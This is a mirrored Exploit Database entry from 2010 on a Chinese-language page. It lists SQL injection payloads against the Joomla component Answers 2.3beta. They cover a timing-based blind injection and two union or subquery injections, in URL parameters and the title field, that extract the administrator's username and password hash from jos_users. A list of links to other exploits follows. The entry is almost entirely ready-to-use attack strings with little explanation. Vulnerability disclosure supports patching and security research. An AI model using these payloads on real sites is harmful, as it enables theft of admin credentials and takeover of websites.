Joomla! Component Answers 2.3beta – Multiple Vulnerabilities

Exploit Database
12 阅读

作者： jdc

日期： 2010-06-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/13923/

# Exploit Title: Joomla Component Answers v2.3beta Multiple Vulnerabilities
# Date: 25 May 2010
# Author: jdc
# Software Link: 
http://extensions.joomla.org/extensions/communication/forum/12652
# Version: 2.3beta
# Tested on: PHP5, MySQL5

Blind SQL Injection
===================
Requires: magic_quotes OFF

?option=com_answers
&task=categ
&id=-1' union select benchmark(100000,md5(5)) as a -- '


Title Field SQL Injection
=========================
title',(select concat(username,char(32),password) from jos_users where 
gid=25 limit 1),'0','1','0','','') -- ;


SQL Injection
=============
Requires: magic_quotes OFF, Joomla! debug OFF

?option=com_answers
&task=detail
&id=-1' union select concat(username,char(32),password),2,3,4,5,6,7,8,9 
from jos_users where gid=25 limit 1 -- '

last Exploits
Joomla! Component Answers 2.3beta – Multiple Vulnerabilities的更多信息

PHP Dashboards 4.5 – ’email’ SQL Injection：
Joomla! Component Article Factory Manager 4.3.9 – SQL Injection：
Netgear Wireless Management System 2.1.4.15 (Build 1236) – Privilege Escalation：
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection：
Dolibarr ERP/CRM 3.2 Alpha – Multiple Directory Traversal Vulnerabilities：
Hospital Management System v1.0 – Stored Cross Site Scripting (XSS)：
WordPress Theme Beauty & Clean 1.0.8 – Arbitrary File Upload：
Tiny File Manager 2.4.6 – Remote Code Execution (RCE)：